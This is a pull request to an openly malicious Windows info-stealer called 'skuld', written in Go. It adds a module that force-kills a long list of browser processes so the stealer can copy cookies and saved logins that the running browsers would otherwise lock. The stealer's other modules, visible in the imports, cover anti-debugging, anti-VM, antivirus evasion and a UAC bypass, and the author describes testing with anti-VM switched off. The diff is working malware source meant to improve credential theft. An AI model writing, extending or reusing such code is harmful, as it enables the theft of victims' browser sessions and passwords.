### PR TITLE
Fix for copying cookies when the browser is running. 

### DIFF
--- a/main.go
+++ b/main.go
@@ -2,6 +2,7 @@ package main
 
 import (
 	"github.com/hackirby/skuld/modules/antidebug"
+	"github.com/hackirby/skuld/modules/processkill"
 	"github.com/hackirby/skuld/modules/antivm"
 	"github.com/hackirby/skuld/modules/antivirus"
 	"github.com/hackirby/skuld/modules/browsers"
@@ -44,6 +45,7 @@ func main() {
 	}
 
 	uacbypass.Run()
+	processkill.Run()
 
 	hideconsole.Run()
 	program.HideSelf()

--- a/modules/processkill/processkill.go
+++ b/modules/processkill/processkill.go
@@ -1,0 +1,46 @@
+package process
+
+import (
+	"os/exec"
+	"strings"
+	"time"
+)
+
+func seqStop(processName string) {
+	cmd := exec.Command("cmd", "/C", "taskkill", "/F", "/IM", processName+".exe")
+	cmd.Run()
+}
+
+func procCheck(processName string) bool {
+	cmd := exec.Command("cmd", "/C", "tasklist", "/FI", "IMAGENAME eq "+processName+".exe")
+	output, err := cmd.Output()
+	if err != nil {
+		return false
+	}
+	return strings.Contains(string(output), processName+".exe")
+}
+
+func recheck(processName string) {
+	seqStop(processName)
+	time.Sleep(1 * time.Second)
+	if procCheck(processName) {
+		seqStop(processName)
+	}
+}
+
+func Run() {
+	browserProcesses := []string{
+		"360chrome", "360se", "avant", "brave", "chrome", "chromium", "citrio",
+		"comodo_dragon", "coolnovo", "coowon", "cyberfox", "deepnet", "dooble",
+		"epic", "firefox", "iceweasel", "iridium", "k-meleon", "maxthon",
+		"msedge", "netscape", "opera", "palemoon", "safari", "seamonkey",
+		"sleipnir", "sputnik", "torch", "ucbrowser", "vivaldi", "waterfox",
+		"yandex", "yandexbrowser", "operagx",
+	}
+
+	for _, processName := range browserProcesses {
+		if procCheck(processName) {
+			recheck(processName)
+		}
+	}
+}

--- a/modules/processkill/processkill.go
+++ b/modules/processkill/processkill.go
@@ -1,4 +1,4 @@
-package process
+package processkill
 
 import (
 	"os/exec"


### PR DESCRIPTION
# Description

Added a check for launching browsers, if yes - then closes and rechecks. If there are none, then just skips on.
I'm not sure that it can work on all systems and browsers, but I added a standard list of processes.

## Type of change

- [#] Fixed error when browser is running and skuld trying to steal cookies/logins

# How Has This Been Tested?

I conducted testing on both virtual machines like apponfly and virtualbox  (turning off anti-VM for a while)

- [run on apponfly vm ] Test A
- [running on virtualbox vm] Test B

* Hardware: windows
* Go Version: 2024.3.5